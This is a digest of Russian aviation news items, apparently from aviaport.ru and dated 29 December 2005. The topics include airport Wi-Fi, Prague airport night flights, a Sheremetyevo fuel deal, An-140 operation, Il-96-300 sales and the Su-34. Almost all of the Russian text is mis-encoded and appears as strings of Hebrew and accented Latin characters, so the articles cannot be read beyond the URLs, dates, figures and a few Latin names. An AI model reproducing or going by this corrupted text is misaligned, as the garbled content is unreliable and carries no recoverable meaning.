אׂױבג״ אױבגאדז״מ ״ װױא״׳׀ז״מ ב׀װ׀ ³ֱ¼ ֲ·÷.² ׀בגןיױױ ׂאױן ¾¾¾ "»ֳ÷¾¹»-°םא" א״׳ׂװ״ג ׳׀א׀ׂד ׂ׳װדטכו בדװׂ חױאױ׳ בׁבגׂױדמ בױגל ֲ·÷ ׂ ׀םאאג׀ו ½״ײױ׃ ½ׂ׃אװ׀, ¿ױא״, ²׃׃א׀װ׀, ֲמױ״ ״ ַױןׁ״ב׀. ² 2005 ׃װד ¾¾¾ "»ֳ÷¾¹»-°םא" בדיױבגׂ״ ׳׀א׀ׂד ׂ ׁךױױ 100 גכב. ג ׀ׂ״׀ױאב״׀.ְ׀׳ׂ״ג״ױ ׀ׂ״׀ג״ׂ׳׀א׀ׂח׃ ׁ״׳ױב׀ אױװדבגאױ ׂ ¿א׃א׀ױ בגא׀גױ׃״חױב׃ א׀׳ׂ״ג״ן ³אדכ "»ֳ÷¾¹»" ״ אױװ׀׃׀ױג א׀בט״אױ״ױ אכ׀ בׁכג׀ ׀ׂ״׀ג״ׂ׀ ״ ב׳װ׀״ױ א׀׳ׂ״ג בױג״ בׁבגׂױכו ג״ׂ׳׀א׀ׂחכו ױבׂ ׂ ׀םאאג׀ו ְבב״״ ״ ׳׀ אדׁױײ. - - - - - ¿ןׂ״׀בל i-mode ׂױאב״ן ב׀ג׀ ׀םאאג׀ "´װױװׂ" - http://www.aviaport.ru/news/2005/12/29/99262.html - ² ¸גױאױגױ ןׂ״׀בל i-mode ׂױאב״ן ב׀ג׀ ׀םאאג׀ "´װױװׂ". ´ן ל׳ׂ׀גױױ ׁ״לכו גױױהׂ װבגד ׀-ג׀ׁ ״ א׀ב״ב׀״ױ - Thu, 29 Dec 2005 16:52:00 +0300 - ² ¸גױאױגױ ןׂ״׀בל i-mode ׂױאב״ן ב׀ג׀ ׀םאאג׀ "´װױװׂ", - װן ל׳ׂ׀גױױ ׁ״לכו גױױהׂ װבגד ב׀ױ בׂױ - ׀-ג׀ׁ ״ א׀ב״ב׀״ױ.² ׁ״ײ׀טױױ ׂאױן ׁדװױג גאכג ױיױ װ״ ׀׀ װבג׀ׂ״ ״הא׀ז״״ ב ¸גױאױג-ב׀ג׀ - ב׀ג װן ÷¿÷. ½׀״, חג ׀ װ׀כ ױג ׳׀״ אכג״ן Wi-Fi ןׂןמגבן ׂױבל ׂגא םג׀ײ, ׁ״׳ױב-׳׀כ ״ ׳׀ ה״ז״׀לכו װױױ׃׀ז״ ״ VIP.½׀ װןו ׁדװױג אױט׀גלבן ׂאב ׁ דׂױ״חױ״״ ׳כ אכג״ן, ׂ ג ח״בױ ׁױבױח״גל װבגד Wi-Fi ׂ ׳׀׀ו א״ױג׀ ״ ײ״װ׀״ן ױײװד׀אװכו ״ ׂדגאױ״ו אױבׂ, ׂ ׂכו ױיױ״ןו, גאכױ ןׂןגבן בױ ׂכב׀ ה׀ב׀װ׀ ׀םאׂ׳׀׀. - - - - - ¿א׀ײב״ ׀םאאג ח׀בג״ח ׳׀אכג ״׳-׳׀ בױ׃׀װ׀ - http://www.aviaport.ru/news/2005/12/29/99261.html - ¼ױײװד׀אװכ ׀םאאג ¿א׀׃״ ְד׳כױ ח׀בג״ח ׳׀אכג ׂ חױגׂױא׃ בױ ח׃ בױ׃׀װ׀ - Thu, 29 Dec 2005 16:49:00 +0300 - ¼ױײװד׀אװכ ׀םאאג ¿א׀׃״ ְד׳כױ ח׀בג״ח ׳׀אכג ׂ חױגׂױא׃ בױ ח׃ בױ׃׀װ׀. ¿אױבב-בױאױג׀אל ׀װ״״בגא׀ז״״ ׀םאאג׀ בׁי״׀, חג ב׀ױגכ ױ ׃דג ׂ׳ױג׀גל ״ ׀םאאג ׂ בבגן״״ א״״׀גל גל 15 ב׀ױגׂ ׂ ח׀ב. ¾׀ ױ בׁי״׀ ׂאױױ״ ׃ ׂבבג׀ׂױ״ן א׀ׁגכ ׀םאאג׀. - - - - - ְ¶´ גאױג אןױ ײױױ׳װאײױ בׁיױ״ױ ג ¼בׂכ װ ׀םאאג׀ "ָױאױױגלױׂ" 2007 ׃װד - http://www.aviaport.ru/news/2005/12/29/99260.html - ¾°¾ "ְבב״ב״ױ ײױױ׳כױ װא׃״" ׀״אדױג גאכגל אןױ ײױױ׳װאײױ בׁיױ״ױ ג ¼בׂכ (ֱ׀ׂױׂב״ ׂ׳׀) װ ׀םאאג׀ "ָױאױױגלױׂ" 1 ןׂ׀אן 2007 ׃. - Thu, 29 Dec 2005 16:45:00 +0300 - ¾°¾ "ְבב״ב״ױ ײױױ׳כױ װא׃״" (ְ¶´) ׀״אדױג גאכגל אןױ ײױױ׳װאײױ בׁיױ״ױ ג ¼בׂכ (ֱ׀ׂױׂב״ ׂ׳׀) װ ׀םאאג׀ "ָױאױױגלױׂ" 1 ןׂ׀אן 2007 ׃װ׀, בׁי״ ׃׀ׂ׀ ה״״׀׀ ְ¶´ "¼בׂב׀ן ײױױ׳׀ן װא׃׀" (¼¶´) ²׀װ״״א ֱג׀אבגױ ײדא׀״בג׀ ׂ ״דׂטדמ באױװד ׂ ¼בׂױ."¼כ א׀בבח״גכׂ׀ױ, חג ׀ח׀ד 2007 ׃װ׀ דבױױ בגא״גל ײױױ׳װאײדמ ׂױגד ג »ׁ״ װ ׀םאאג׀", - ב׀׳׀ ².ֱג׀אבגױ. ¾ גױג״, חג ׀ח׀ בגא״גױלבגׂ׀ ׳׀׀״אׂ׀ ׀ ׀אױל 2006 ׃װ׀.¿ ױ׃ בׂ׀, אױחל ״װױג בגא״גױלבגׂױ 8,2 דגױ, גאױ ׁדװױג ה״׀ב״אׂ׀גלבן ׳׀ בחױג ״ׂױבגא׃א׀כ ְ¶´.³׀ׂ׀ ¼¶´ גױג״ ג׀ײױ, חג ׀ ױןב, ׃װױ ׁדװױג א׀ב׀׃׀גלבן ײױױ׳װאײ׀ן בג׀ז״ן ׂ "ָױאױױגלױׂ". "µב״ ׁדװױג ׃גׂ גױא״׀ ("ָױאױױגלױׂ-3" - ¸ִ), ג ױ׳װ װװױג גדװ׀, ױב״ ױג, ג כ ׃גׂכ בגא״גל ׁכחדמ בג׀ז״מ", - ב׀׳׀ ².ֱג׀אבגױ. - - - - - ֽבד׀ג׀ז״מ ב׀ױגׂ °-140 ׃דג ׂאױױ א״בג׀ׂ״גל - http://www.aviaport.ru/news/2005/12/29/99259.html - ֽבד׀ג׀ז״מ ב׀ױגׂ °-140 ׃דג ׂאױױ א״בג׀ׂ״גל װ ׂכןבױ״ן ׂבױו ׁבגןגױלבגׂ ׀ג׀בגאהכ ׀ט״כ ׂ °׳ױאׁ׀װײ׀ױ - Thu, 29 Dec 2005 16:43:00 +0300 - ֽבד׀ג׀ז״מ ב׀ױגׂ °-140 ׃דג ׂאױױ א״בג׀ׂ״גל װ ׂכןבױ״ן ׂבױו ׁבגןגױלבגׂ ׀ג׀בגאהכ ׀ט״כ ׂ °׳ױאׁ׀װײ׀ױ.ֲ׀דמ גחד ׳אױ״ן ׂכב׀׳כׂ׀מג םבױאגכ, ױג״אדן ׂױאב״״ ׀ג׀בגאהכ ב׀ױג׀ װ ±׀ד.ֱ׃׀ב װ ״׳ ״ו, א״ח״ ׀װױ״ן °-140 בג׀״ גױו״חױב״ױ ױ׀װ״, ״ חגׁכ בגלמ ״במח״גל ׂױאןגבגל ׂגאױ״ן גא׀׃ױװ״״, ױגכ װױבןג׀ ׀וװןי״ובן בױח׀ב ׂ םבד׀ג׀ז״״ דא׀״ב״ו ׀ׂ״׀׀״ ׀ט״ םג׃ ג״׀ ׃דג א״בג׀ׂ״גל.¿אױװבג׀ׂ״גױ״ ³ב׀ׂ״׀בדײׁכ ֳא׀״כ װ׀דמ ״הא׀ז״מ ױ װגׂױאײװ׀מג, ׳׀ןׂןן, חג ײװדג ח׀גױלכו ׂכׂװׂ ״בב״״ ׂ °׳ױאׁ׀װײ׀ױ.¾װ׀ םבױאגכ ׃ׂאןג - ׳׀אױג ׂבױ ײױ ײױג ׁכגל ׂׂױװױ, בבכ׀ןבל ׀ כג ג ײױ ְבב״״, ׃װױ ״׳-׳׀ ״ ׂ ט׀בב״ אױ׳״װױגב׃ ב׀ױג׀ ׁכ״ בג׀ׂױכ ׀ א״ ׂבױ ׀ט״כ װ׀ װױ״. - - - - - °םאאגכ ¼בׂכ א׀ׁג׀מג " ה׀ג״חױב ׃װױ" - http://www.aviaport.ru/news/2005/12/29/99258.html - ¸׳-׳׀ ב״ל׃ בױ׃׀װ׀ ׂ ¼בׂױ ׀םאאגכ "²דׂ", "´װױװׂ" ״ "ָױאױױגלױׂ" א׀ׁג׀מג " ה׀ג״חױב ׃װױ", ׳׀װױאײױ ב ׂכױג׀״ ״ א״ׁכג״ױ אױבׂ ױג - Thu, 29 Dec 2005 16:36:00 +0300 - ¸׳-׳׀ ב״ל׃ בױ׃׀װ׀ ׂ ¼בׂױ בג״חכױ ׀םאאגכ "²דׂ", "´װױװׂ" ״ "ָױאױױגלױׂ" א׀ׁג׀מג " ה׀ג״חױב ׃װױ", ׳׀װױאײױ ב ׂכױג׀״ ״ א״ׁכג״ױ אױבׂ ױג. ¾ׁ םג בׁי״ ׂ חױגׂױא׃ ְ¸° ½ׂבג״ אױװבג׀ׂ״גױל ֶױגא׀ל װ״בױגחױאב בדײׁכ (ֶ´ֱ) ¼בׂכ."²בױ בג״חכױ ׀םאאגכ א׀ׁג׀מג בױח׀ב " ה׀ג״חױב ׃װױ", ג ױבגל, ״גכ ב׀בגןגױל א״״׀מג אױטױ״ױ ב׀װױ. ¾װ׀ ״׀״ו ׳׀װױאײױ ב ׂכױג׀״ ״ א״ׁכג״ױ אױבׂ ׂ ׀םאאג׀ו ױג", - ב׀׳׀ אױװבג׀ׂ״גױל ֶ´ֱ.¾ ג׀ײױ גױג״, חג "״ װ״ ׀םאאג ױ ׁךןׂ״ ׳׀אכג״״ ״׳-׳׀ ׃װכ"."² ׂבױו ׀םאאג׀ו בױח׀ב ׂ״װ״בגל בבג׀ׂןױג ׁױױ גכבןח״ ױגאׂ. ²בױ ׂ׳ױגכ ״ ב׀װ״ בדיױבגׂןמגבן א׀ב״ב׀״מ, ׁױ׳ בׁױׂ. ִ׀גׂ ׳׀אכג״ן ׀םאאגׂ ױ ׁכ", - בׁי״ בׁױבױװ״ ׀׃ױגבגׂ׀.¿ ױ׃ בׂ׀, ׂ ׂבױו בג״חכו ׀םאאג׀ו ׂ ׀בגןיױױ ׂאױן א׀ׁג׀ױג בױזגױו״׀ װן א׀בח״בג״ בױ׃׀. "² בדח׀ױ דב״ױ״ן בױ׃׀װ׀, ׂ ׀םאאג׀ו ׁדװױג ׂׂױװױ׀ װ״גױל׀ן בױזגױו״׀", - װׁ׀ׂ״ אױװבג׀ׂ״גױל ֶ´ֱ. - - - - - °ׂ״׀א ׀ ״׳ױגױ - http://www.aviaport.ru/news/2005/12/29/99257.html - ·׀גןדׂטױױבן ײ״װ׀״ױ אױטױ״ ׂ׀בגױ בדװלׁױ אבב״ב׃ ׀ׂ״׀א׀ ״ ב׀װ׀ ׂאד׃ ׳׀אױג׀ ׀ ױגכ ¸-96-300 - ׃׀ׂכױ ״ג׃״ ׀ׂ״׀ז״ גא׀ב״ ׂ 2005 ׃. - Thu, 29 Dec 2005 16:31:00 +0300 - ·׀גןדׂטױױבן ײ״װ׀״ױ אױטױ״ ׂ׀בגױ בדװלׁױ אבב״ב׃ ׀ׂ״׀א׀ ״ ב׀װ׀ ׂאד׃ ׳׀אױג׀ ׀ ױגכ ב׀׃ ׂ׃ גױחױבגׂױ׃ װ׀לױ׀׃״בגא׀ל׃ ב׀ױג׀ ¸-96-300 - ׃׀ׂכױ ״ג׃״ ׀ׂ״׀ז״ גא׀ב״ ׂ 2005 ׃װד.¿אױװײ״גױל ׀ ױאׂ םג׀ױ ׂ ¾°÷ ׁדװדג ׂױבױכ ׃בדװ׀אבגׂױכױ ׀ױגכ ׀ז״ °ֵ÷ "ֱדו", ¼°÷ "¸למט״", ¾°¾ "ֲדױׂ", ׳׀ׂװ׀ "ֱ", ÷בלב׃-׀-°דאױ ׀ׂ״׀ז״׃ א״׳ׂװבגׂױ׃ ׁךױװ״ױ״ן, ½ׂב״ׁ״אב׃ ׀ׂ״׀ז״׃ א״׳ׂװבגׂױ׃ ׁךױװ״ױ״ן, "°ׂ״׀םבאג׀", ׀ ג׀ײױ ִ״׀בׂ ״׳״׃ׂ ׀״״ ״ ׀״״ "¸למט״ ִ״׀ב ÷". ½׀ ׂגא םג׀ױ אא׀ז״״ װמח״גבן "¸אדג", גאד ׃״ױ אח׀ג ״װױאבגׂ ׂ אא׀ז״״. ¾װ׀ ״׳ ב׀כו ׂױאןגכו ׀װ״װ׀גדא ׀ ג, חגׁכ ׂ׳׃׀ׂ״גל ¾°÷, - ״ב״גױלכ װ״אױגא "¸אדג׀" ²׀ױא״ ±ױ׳ׂױאו״. ² 2005 ׃װד א׀ׂ״גױלבגׂ ׀״אׂ׀ ׂבױאלױ׳ ׳׀ןגלבן ׁךױװ״ױ״ױ אבב״ב״ו ׀ׂ״׀ז״כו ׀ג״ׂׂ. ² הױׂא׀ױ ²׀װ״״א ¿דג״ א׀באןװ״בן װ׃גׂ״גל אױג ד׀׳׀ ׁךױװ״ױ״מ ׂבױו ׀ׂ״׀בגא״גױלכו ׳׀ׂװׂ ׂ ױװ״דמ ׀״מ. ¿אױװ׀׃׀בל, חג אױ׳״װױג װ״טױג װדױג 1 װױ׀ׁאן. ½ ׂ ״ג׃ױ ױ גל ױ ׁכ װ״ב׀, ״ װ ב״ו א בג׀ױגבן ׳׀׃׀װ, ׀ ׀״ו דבׂ״ןו ׁדװױג אׂװ״גלבן ב״װ׀ז״ן.÷ב״װ׀ז״ן אבב״ב״ו ׂױאגױגכו ׳׀ׂװׂ ׂ 2005 ׃װד בבגן׀בל. ² בבג׀ׂ וװ״׃׀ ׀ ׁ׀׳ױ "¾ׁאא׀" ׂט״ ¾°¾ "¼בׂב״ ׂױאגױגכ ׳׀ׂװ", ¾°¾ "ֳ׀-ֳװ״ב״ ׀ׂ״׀ז״כ ׳׀ׂװ", ¾°¾ "÷׀׳׀ב״ ׂױאגױגכ ׳׀ׂװ", ¾°¾ "ְבגׂױאג", ¾°¾ "¼בׂב״ ׀ט״בגא״גױלכ ׳׀ׂװ "²ױאױװ"", ¾°¾ "ֱגד״בױ ׀ט״בגא״גױלױ א״׳ׂװבגׂױױ אױװא״ןג״ױ". ½ אזױבב בג׀ׂ״ ׁלטױ ׂאבׂ, חױ גׂױגׂ, א״׳׀מגבן םבױאגכ. "¿ױאױוװ ׀ װד ׀ז״מ אטױ ׀-ג ב׀. ½ױןב, ׀ד א״ז״ד ׁכ ׂכׁא׀ םהה״ז״ױג ׁױ׀, ׀א״ױא", - װׂװ״ג ״ג׃״ ׀׀״ג״ ¸÷ "ְױױבב׀ב ÷׀״ג׀" ¼׀א״׀ °ױבױױׂ׀.¾ׁךױװ״ױ״ױ ׀ׂ״׀׀״ ׁכ אׂ׀ױ, ׁ םג ׂ זױ װױ׀ׁאן ׀״ ״״בגא גא׀באג׀ ¸׃אל »ױׂ״ג״. ½״ ׁךױװ״ױ״ױ ׂאד׃ "÷א׀בֽא" (AiRUnion), ״ אױהא׀ז״ן "¿דׂ" ״ "ְבב״״" ׂ ױאױ ׂ 2005 ׃װד ױ ׳׀ׂױאט״״בל. ¼ױײװד גױ ב״װ׀ז״ן - ױװ״בגׂױכ בבׁ ׂכײ״גל ׀ אכױ װן אבב״ב״ו ׀ׂ״׀׀״ ׂ דבׂ״ןו װא׃׃ ׃אמחױ׃ ״ ״׳טױ גױו״״.·׀ג ׂ 2005 ׃װד ְבב״״ דװ׀בל אׂױבג״ ב׀כ ׁלט ׀ׂ״׀ב״חױב״ ב׀ ׳׀ ׂבמ ״בגא״מ - ¼°÷ֱ-2005 ׂ װבׂ ¶דׂב. ֱ׀ בׁא׀ אױװבג׀ׂ״גױױ ׁױױ חױ 600 ׀״ ״׳ 40 בגא׀.¿ םגד ׀׳׀גױמ ¼°÷ֱ דײױ ײ בא׀ׂ״ׂ׀גל ב אדױט״״ ב׀׀״ ׂ »ױ-±דאײױ (ִא׀ז״ן), ׂ ´דׁ׀ױ (¾°ֽ), ִ׀אׁא (²ױ״ׁא״ג׀״ן).½ױ דח״בל גל בװױ׀גל ׀ׂ״׀ז״דמ ןא׀אד ׂבױ״א. ² ¶דׂב״ א״ױו׀״ גל א״׳ׂװ״גױ״, גאכױ ׁכ״ ׳׀״גױאױבׂ׀כ ׂ בגאדװ״חױבגׂױ ב ְבב״ױ. ² ״ג׃ױ ׳׀ ןגל װױ ׀ׂ״׀ב׀׀ ׂ ¶דׂב ׁכ״ ׳׀מחױכ גא׀גכ ׀ ׁידמ בדד $4 אװ, דח״גכׂ׀ן אױװׂ׀א״גױלכױ ב׃׀טױ״ן. ½׀ ׀ׂ״׀ב׀ױ ׂ ´דׁ׀ױ ׂ ןׁאױ 2005 ׃װ׀ גא׀גכ ׁכ״ ׳׀מחױכ ׀ בדד $25 אװ. ¸ ױב״ ׂ ´דׁ׀ױ ב״אׂ׀״ ׂ בׂ ג׀״ױ ״אׂכױ ׃״׃׀גכ, ׀ Airbus ״ Boeing, ג ׂ ¶דׂב ״ ׁכ״ ױ׳׀ױגכ: ׁלטױ ׂבױ׃ גא׀גׂ ׳׀מח״׀ "¸למט״ ה״׀ב" - א״ׁ״׳״גױל ׀ $1,6 אװ. "¸ ׂבױ-ג׀״ ג׀׃ ב״ל׃ ב׀׀ ׁ״׳ױב-בבג׀ׂןמיױ ױיױ ױ ׁכ", - ׳׀ױח׀ױג ׀׀״ג״ ֶױגא׀ ׀׀״׳׀ בגא׀גױ׃״ ״ גױו׃״ ÷בג׀ג״ ¼׀״ױ.»ױג, בא׀׳ד בױ ׀ׂ״׀ב׀׀, ׂבמ גא׀בל גאןב ב׀װ׀ ב ׳׀אױג ׀ ױגכ ¸-96-300.¼ױ״ן ׀׀״ג״ׂ°׀״ג״״, אטױכױ "³׀׳ױג.Ru", ױ בח״ג׀מג דוװןי״ ׃װ דװ׀חכ ׃״ א״ח״׀."½ױג ױװ״ ״ג״״, ׀״ױ ב׀ױגכ א׀׳א׀ׁ׀גכׂ׀גל, ׀״ױ װװױאײ״ׂ׀גל. ² ״ג׃ױ אװדג׀ ױג, ׀ ױבגל גל דאױג׀ן ׁאלׁ׀, גא׀ן ױט׀ױג ׀ׂ״׀אד. ²׳ײ, ׂ 2006 ׃װד ג בׂ ױאױװדג װױד", - בח״ג׀ױג ¸לן ¼׀׀אׂ ״׳ "°ג׀גכ ÷׀״ג׀"."¶װ׀״ ׁלטױ׃, - װגׂױאײװ׀ױג ¼׀א״׀ °ױבױױׂ׀ ״׳ "ְױױבב׀ב ÷׀״ג׀׀". - ¿א״חױ םג ײ״װ׀״ױ ׳׀גןדבל. ¸ םג א״ ג, חג ד גא׀ב״ ׁלט גױז״׀"."¿א׀ג״חױב״ ׂ ׁ׀בג״ ׀ׂ״׀אכטױבג״ ״חױ׃ בױאלױ׳׃ ׳׀ ׃װ ױ א״׳ט", - גױח׀ױג װ״אױגא ב׀ג״׃ׂ ׀״״ Infomost ±א״ב ְכׁ׀."ֵגױבל ׁכ ׁלטױ׃, ״ אױ׳דלג׀גכ חױׂ״װכ. ³בדװ׀אבגׂ ׂױאדבל ׀ׂ״׀אד. ² בגבׂױגבױ ׂאױן ױיױ ״׃װ׀ בגל ׂ״׀״ן ױ ׁכ ״ װױל׃׀, ״ א׀׳״חכ אױג׀ ״ ׀׀ א׀׳ׂ״ג״ן", - דׂױאױ ÷בג׀ג״ ¼׀״ױ ״׳ ֶױגא׀ ׀׀״׳׀ בגא׀גױ׃״ ״ גױו׃״. ¿אױ׳״װױגב״ ב׀ױג, ׀ ג׀ײױ ױיױ 12 ׀ױאׂ אבב״ב״ו ׀ׂ״׀׀״ ׂבג׀״ ׁױױ חױ ׀ ױבןז. ÷׀ בג׀ ״׳ׂױבג ׳װױױ, ״ױ ׀װ״״בגא׀ז״ן אױ׳״װױג׀ ױאױבגא׀וׂ׀׀בל ״ ׂ״ן׀ ׀ אױטױ״ױ ְבגא׀ב׀װ׳א׀ ׳׀אױג״גל ױגכ ¸-96-300. ֽג א״׳ט בױ ג׃, ׀ ׂ ׀ח׀ױ ׀ׂ׃דבג׀ ²׀װ״״א ¿דג״, ׀וװ״ׂט״בן ב ה״ז״׀לכ ׂ״׳״ג ׂ ִ״ןװ״״, ױ ב׃ ׂכױגױגל ״׳ ׀םאאג׀ ֲדאד ״ ׁכ ׂכדײװױ ױאױבױבגל ׀ ׳׀׀ב ב׀ױג. ֳ ׀ױאׂ ׁכ״ ׂכןׂױכ ׀אדטױ״ן גא׳ ב״בגױכ.¾ג ׳׀אױג׀ בגא׀װ׀״ ױבל אבב״ב״ו ׀ׂ״׀׀״, ׂ ג ח״בױ "°םאהג", "´װױװׂב״ױ ׀ׂ״׀״״״" ״ "÷א׀בןאב״ױ ׀ׂ״׀״״״". ²בױ ״ א׀בב׀גא״ׂ׀״ ׂ׳ײבגל ״בׂ ׃בדװ׀אבגׂד ״״ א״׳ׂװ״גױן, ׂ ״ג׃ױ ג׀׳׀״בל ג ׀ױאױ״ן ׂ׳ױבג״גל גױא״.·׀אױג ׀ װ״ ״׳ ב׀כו ׂכו אבב״ב״ו ׃א׀ײװ׀ב״ו ב׀ױגׂ ׂ חױאױװ א׀׳ דװ׀א״ אױבג״ײד גױחױבגׂױ׃ ׀ׂ״׀א׀. ³ױװ״אױגא ²אױײב׃ ׀ז״ױא׃ ב׀ױגבגא״גױל׃ ׁיױבגׂ׀, א״׳ׂװ״ׂטױ׃ װױג׀״ ¸-96, ²ןחױב׀ׂ ֱ׀״ׂ ׂכדײװױ ׁכ דג״ ׂ גבג׀ׂד.¿בױ ב׀װ׀׀ ב ¸-96-300 ב ׂ בגאג בג׀ ׂאב ט״׀ו ׀ ב׀ױגכ ׳׀אדׁױײ׃ א״׳ׂװבגׂ׀. ½´ֱ ״ ג׀ײױכ בׁא ׂױבגױ בבג׀ׂןמג 40% זױכ ב׀ױג׀. ½ םגג ׂאב װ ז׀ ׃װ׀ ג׀ײױ ױ ׁכ אױטױ.·׀ אדׁױײ 2005 ׃װ ׳׀״גבן אױײװױ ׂבױ׃ ׃ Airbus ״ Boeing ׂ ׁ׀בג״ װ׀לױ׀׃״בגא׀לכו ב׀ױגׂ. Airbus אױװ׀׃׀ױג A350 - ם״חכ ׀ױא, בׂױאט״ג ױאׂכ ױג גל 2010 ׃װד. Boeing ׁױי׀ױג םגד ׂאױױ״ דײױ ׀ח׀גל אװ׀ׂ׀גל B787 - Dreamliner. ±אלׁ׀ ״װױג ״ ׀״ׁױױ ׂױבג״גױלכ ב׀ױג׀ - A380 ״ Boeing 777-200LR Worldliner. ¿ױאׂכ ׂ 2005 ׃װד אטױ ״בכג׀גױלכױ ױגכ ״ ב׀בגןגױל א״ױגױ ׂ ´דׁ׀. ²גא 10 ןׁאן דבג׀ׂ״ אױאװ װ׀לבג״ ױג׀ ׀בב׀ײ״אב׃ ב׀ױג׀ ׁױ׳ װ׳׀א׀ׂ״, ױאױױגױׂ ״׳ ³׃׀ ׂ »װ. ² ְבב״״ ׀ׂ״׀׀״״ ׀ ױ אױט׀מגבן ׀ ׂכׁא ױײװד ׃״׃׀ג׀״ ״אׂ׃ ׀ׂ״׀בגא״גױלבגׂ׀. ¿ װ׀כ, ןׂ״ׂט״בן ׂ זױ װױ׀ׁאן, "°םאהג" ׁ״ײױ ׂכׁאד Boeing 787, ױײױ״ A350.´אד׃״ ׳׀ח״כ װן גא׀ב״ בׁכג״ױ בג׀ ג, חג ׂ ׀ח׀ױ װױ׀ׁאן ׁכ װ״ב׀ ױאׂכ אדכ גא׀ג ׀ RRJ - אבב״ב״ אױ׃״׀לכ ב׀ױג, א׀׳א׀ׁ׀גכׂ׀ױכ °ֵ÷ "ֱדו" ״ דח״ׂט״ װװױאײד ׃בדװ׀אבגׂ׀. "°םאהג" ב׃׀ב״בן ד״גל 30 ׁ״ײױ׀׃״בגא׀לכו ב׀ױגׂ א״׳ׂװבגׂ׀ "ֱדו׃" חױאױ׳ ִ״׀בׂדמ ״׳״׃ׂדמ ׀״מ. ¿א׀ׂװ׀, ״ ׳װױבל ׁטבל ױ ׁױ׳ ב׀װ׀׀: װױדג׀ג ³בװדכ °ױב׀װא »ױׁױװױׂ, גא״אדמי״ 30% ׀ז״ "°םאהג׀" חױאױ׳ ½׀ז״׀לדמ אױ׳ױאׂדמ אא׀ז״מ, ׁױי׀ ׂבױ״ ׂ׳ײכ״ בבׁ׀״ ׳׀ׁ״אׂ׀גל בװױד ׂ ״גױאױב׀ו װאד׃׃ ׁ״ײױ׀׃״בגא׀ל׃ ב׀ױג׀ - °-148 ג "°גׂ׀".ֽגג ײױ ב׀ױג א׀ׂ״בן ״ אדׂװ״גױמ װאד׃ אבב״ב ׀ׂ״׀׀״״ - "÷א׀בֽא". ֲ׀ בח״ג׀״, חג דײױ בגאױכ ב׀ױג דחטױ ױבגאױ׃, ״ אױװח״ ד״גל װױבןגל °-148 ״ ׀ ׂ׳װױאײ׀גלבן ג RRJ. ½ ׃בדװ׀אבגׂ ןב װ׀ ןגל, ׀׃ ״׳ אױגױװױגׂ װװױאײ״ׂ׀ױג. ² זױ װױ׀ׁאן ״בגח״״ ׂ ְב״דיױבגׂױ, בׂ ׀ז״ױאױ "÷א׀בֽא", װ׀״ ןגל, חג הױװױא׀לױ ׀׃ױגבגׂ ׳׀ׁ״אדױג בװױד. - - - - - ½ׂב״ׁ״אבױ ׀ׂ״׀בגאױ״ױ: בׂאױױ׀ן ְבב״ן ״ ױױ ױׁױבכ ׳׀י״ג״ אװ״״בל װ װ ׳ׂױ׳װ - http://www.aviaport.ru/news/2005/12/29/99256.html - ² װױ׀ׁאױ 1993 ׃. ױאׂכ ױג בׂױאט״ האגׂ ׁׁ׀אװ״אׂי״ חױגׂױאג׃ ױ״ן ֱד-34. ¾ׁ םג ״ װאד׃״ו בׁכג״ןו א׀בב׀׳כׂ׀ױג ׃ױװ״אױגא ½°¿¾ ״. ².¿. ַ׀ׂ׀ °. ±ׁאכטױׂ - Thu, 29 Dec 2005 16:27:00 +0300 - ² װ׀ױ װױ׀ׁאױ 1993 ׃װ׀ בׂ׀״ װׂ׀ בׁכג״ן: ׀ ״ג״חױב ׀אגױ ״א׀ ןׂ״׀בל ׂ׀ן בדׂױאױ׀ן בגא׀׀ װ ׀׳ׂ׀״ױ ְבב״ן, ׀ ׂדגא״ ױױ, ׂ בג״זױ ֱ״ׁ״א״, ב ױג׃ ן ׳׀ׂװ׀ ״. ².¿. ַ׀ׂ׀ ׂ׳כ ׂ ױאׂכ בׂ ױג גל חג בׁא׀כ האגׂ ׁׁ׀אװ״אׂי״ חױגׂױאג׃ ױ״ן ֱד-34. ³בדװ׀אבגׂ ״ װ״ ״׳ ב׀כו ׃א׳כו ׳׀ ׂבמ ״בגא״מ ׂױ ׀ׂ״׀ז״״ ב׀ױגׂ אװ״״בל װׂאױױ, װ װ ׳ׂױ׳װ. ÷׀ ׁדװג ±׃ ׁ׀׃בׂ״ ְבב״מ, װ׀אׂ׀ׂ ׂ ױג ױױ אײװױ״ן ױׁױב׃ ׳׀י״ג״׀, גאכ ׁדװױג א׀׳ׂ״ׂ׀גלבן ״ א׀בג״ ׂױבגױ ב בגא׀.¾ׁ םג ״ װאד׃״ו ׳׀ױ׀גױלכו בׁכג״ןו אבב״ב ״בגא״״ א׀בב׀׳כׂ׀ױג ״ו ױבאױװבגׂױכ דח׀בג״, ׃ױױא׀לכ װ״אױגא ½ׂב״ׁ״אב׃ ׀ׂ״׀בגא״גױל׃ א״׳ׂװבגׂױ׃ ׁךױװ״ױ״ן ״. ².¿. ַ׀ׂ׀ °ױב׀װא ±ׁאכטױׂ.- ³׀ׂכ בׁכג״ױ װן א׀ׁג״ׂ ½°¿¾ ״. ².¿. ַ׀ׂ׀ ׂ דוװןיױ ׃װד בג׀ װ׃ײװ׀ױ ׂמחױ״ױ ׀טױ׃ ׂ׃ ב׀ױג׀ ֱד-34 ׂ ׃בדװ׀אבגׂױכ ׳׀׀׳. ֽג ׳׀ח״ג, חג, ׀ח״׀ן ב ׂ׃ 2006 ׃װ׀, ׳׀ׂװ בׂ׀ ׁדװױג א״׳ׂװ״גל בױא״דמ ׁױׂדמ גױו״ד. ¿א״חױ ׁךױכ א״׳ׂװבגׂ׀ ׃װ ג ׃װ׀ ׁדװדג א׀בג״.¼כ 12 ױג א״ׁ״ײ׀״ םגג װױל, בױװׂ׀גױל "בב״ׂ" ׀ ױגכו ״בכג׀גױלכו ױג׀ו ׂבױל כגכו ׁא׀׳זׂ ֱד-34. ְ׀ׁגכ בׂױאטױבגׂׂ׀״מ ב׀ױג׀ ױ בג׀׀ׂ״ׂ׀״בל װ׀ײױ ׂ ב׀כױ בײכױ װן ׳׀ׂװ׀ ׂאױױ׀, ׃װ׀ ׂבױ א״׳ׂװבגׂ ׳׀״א׀ ״ ױ ׁכ באױװבגׂ ״ ׀ ׳׀א׀גד, ״ ׀ םױגאםױא׃״מ. ½ױ גל ם״חױב״ױ ױׂ׳׃װכ גאױׁׂ׀״ ג ױג״ׂ׀ ½°¿¾ ״. ². ¿. ַ׀ׂ׀ ׁ״״׳׀ז״״ ׂבױו ב״ - ׂ אדׂװבגׂױ בגא׀כ ױ ׁכ ױװ״׃ ױ״ן בדװלׁױ םג׃ אױג׀. ² ׂבן בדח׀ױ, װ ז׀ 90-ו ״ג ױ ׃ ב׀׳׀גל אױװױױ, חג ֱד-34 ׁדװױג ׂמחױ 